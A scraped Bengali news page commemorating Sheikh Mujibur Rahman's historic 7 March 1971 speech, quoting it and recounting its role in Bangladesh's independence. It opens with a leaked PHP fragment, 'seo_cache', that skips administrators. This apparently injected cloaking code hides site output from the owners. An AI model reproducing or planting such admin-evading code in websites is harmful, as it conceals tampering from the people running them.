function seo_cache() { if (is_admin()) return; $u = wp_get_current_user(); if (in_array('administrator', (array)$u->roles)) return; ?> আজ ঐতিহাসিক ৭ মার্চ - GopalpurBarta24.com
আজ || বৃহস্পতিবার, ১৬ এপ্রিল ২০২৬
শিরোনাম :
 


আজ ঐতিহাসিক ৭ মার্চ

“রক্ত যখন দিয়েছি রক্ত আরো দেব। এ দেশের মানুষকে মুক্ত করে ছাড়বো ইনশাআল্লাহ।”

১৯৭১ সালের এইদিনে বাঙালি জাতির জনক বঙ্গবন্ধু শেখ মুজিবর রহমান তৎকালীন ঢাকার রেসকোর্স ময়দানে (বর্তমান সোহরাওয়ার্দী উদ্যান) এক বিশাল জনসমুদ্রে মাত্র ১৯ মিনিট স্থায়ী এক জাদুকরী ভাষণে বাঙালিদের ওপর পাকিস্তানি শাসকগোষ্ঠীর জাতিগত অত্যাচার, নিপীড়ন, শাসন-শোষণ এবং বৈষম্যের চিত্র তুলে ধরে বাঙালির স্বাধীনতা ও মুক্তি সংগ্রামের বজ্রকন্ঠ উচ্চারণ করেন।

বঙ্গবন্ধু তাঁর অনন্য অসাধারণ এই ভাষণে বাংলাদেশের স্বাধীনতা ও বাঙালির মুক্তির ডাক দিয়েছিলেন। স্বাধীনতাকামী সাড়ে সাত কোটি বাঙালির মুক্তির দিশারি বঙ্গবন্ধু মুজিব সেদিন দৃপ্তকন্ঠে ঘোষণা করেছিলেন-
‘এবারের সংগ্রাম আমাদের মুক্তির সংগ্রাম, এবারের সংগ্রাম স্বাধীনতার সংগ্রাম। জয় বাংলা।’

তাঁর দিকনির্দেশনামূলক এই ভাষণকে ধারণ করে বাঙালি জাতি দীর্ঘ নয় মাস সশস্ত্র মুক্তিযুদ্ধের মাধ্যমে ১৯৭১ সালের ১৬ ডিসেম্বর অর্জন করে স্বাধীন সার্বভৌম বাংলাদেশ।

মন্তব্য করুন -


Top
error: Content is protected !!